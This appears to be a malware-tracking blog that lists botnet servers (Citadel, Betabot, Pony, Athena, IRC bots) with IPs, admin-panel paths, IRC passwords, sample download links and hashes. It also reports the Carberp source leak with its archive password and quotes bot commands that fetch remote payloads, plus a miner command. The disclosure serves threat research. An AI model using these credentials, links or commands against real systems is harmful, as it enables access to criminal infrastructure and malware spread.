Resolved zbraaadanstfesse.org to 188.8.131.52
Server: zbraaadanstfesse.org
Gate file: /p/stats.php
This is currently being downloaded by this Citadel net. This is also a backup domain for a Betabot, and is the domain currently used by it.
Betabot login: hxxp://zbraaadanstfesse.org/~.poto/login.php
Related md5s (search on malwr.com for samples): 7ec71449228f4209b9df59bb68ec3a5f
Hosting infos: http://whois.domaintools.com/184.108.40.206
x.fullhdizle.co (IRC botnet hosted by hostforweb.net)
Resolved x.fullhdizle.co to 220.127.116.11
Server: x.fullhdizle.co
Port: 1989
Server password: r00t33
Channel: #xxx
Channel password: r00t33
Topic for #xxx is: !open hxxp://www.fullhdizle.co
Topic for #xxx set by Coder at Wed Jun 26 14:02:37 2013
Related md5s (search on malwr.com to download the samples): 8cbdc21108b468ecd95644f18b83324d
Hosting infos: http://whois.domaintools.com/18.104.22.168
22.214.171.124 (Athena IRC botnet hosted by hostkey.com)
Server: 126.96.36.199
Port: 6667
Current local users: 436, max 2038
Channel: #network
#network 411
Related md5s (search on malwr.com to download the samples): 891905810486c6dee6d246f9845fb5cd
Hosting infos: http://whois.domaintools.com/188.8.131.52
Carberp The Banking Trojan Source Now Available To Public
First Zeus, now Carberp: the source has been leaked to the public.
Picture from dk forum
Source and password for the rar archive are available via Twitter, thanks to ivanlef0u.
Another link for the source here (around 1.88GB).
Password for the archive: "Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh"
184.108.40.206 (Pony hosted in Hong Kong, Hong Kong, Unit 1702 Ramada Tower)
Admin panel: 220.127.116.11/pfx/admin.php
The rest of the files are here: hxxp://18.104.22.168/pfx/ (setup.php is still in this folder)
Pony sample: hxxp://22.214.171.124/pn1.exe
Hosting infos: http://whois.domaintools.com/126.96.36.199
srv1.su (Betabot HTTP botnet hosted by softronics.ch)
Resolved srv1.su to 188.8.131.52
Server: srv1.su
Gate file: /b/order.php
Everyone should congratulate snk, who has taken his first baby steps into the 21st century by using an HTTP bot. Unfortunately for him he chose to use the l33t Hackforums bot Betabot with a 1MB stub AutoIt crypter, but I guess he can only manage to
Read more...
184.108.40.206 (Pony loader hosted by infobox.ru)
Server: 220.127.116.11
Gate file: /Panel/gate.php
Related md5s (search on malwr.com to download the samples): 160419b4c5f8415b41fb23e99be12b19
Hosting infos: http://whois.domaintools.com/18.104.22.168
srv1.su (snk's botnet hosted in Luxembourg, Steinsel, Root Sa)
The bot is downloaded by this AutoIt sample: hxxp://sglegacy.com/AA/dava.exe, which looks like an HTTP AutoIt downloader.
Login here: hxxp://www.sglegacy.com/AA/index.php/login
Another sample downloaded by dava.exe is this: hxxp://la-majeur.com/images/beta.exe (Betabot)
Here is dava.exe decompiled:
    $at2 = "0"
    $at5 = 0
    $at1 = "0"
    $at3 = "0"
    $avm = "0"
    $asb = "0"
    $at4 = "0"
    #NoTrayIcon
    #Region
    #AutoIt3Wrapper_UseUpx=n
Read more...
belakey.com (Pony hosted in Germany, Gunzenhausen, Osauhing Future Technologies)
Resolved: [belakey.com] to [22.214.171.124]
Pony gate: belakey.com/pony/gate.php
Admin panel: hxxp://belakey.com/pony/admin.php
Sample: hxxp://126.96.36.199/z/pony4.exe
Hosting infos: http://whois.domaintools.com/188.8.131.52
y.osej36.com (IRC botnet hosted by gandi.net)
Resolved y.osej36.com to 184.108.40.206
Server: y.osej36.com
Port: 80
Server password: passwd
Channel: #root
Channel password: redem
!NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e
!NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e
!s -n
A modified ircd is used, so you may have trouble connecting.
Alternate domains: y.v23sdy.com y.rwt234.com
Bitcoin mining info: minerd.exe -a scrypt -s 20 --no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -x
Read more...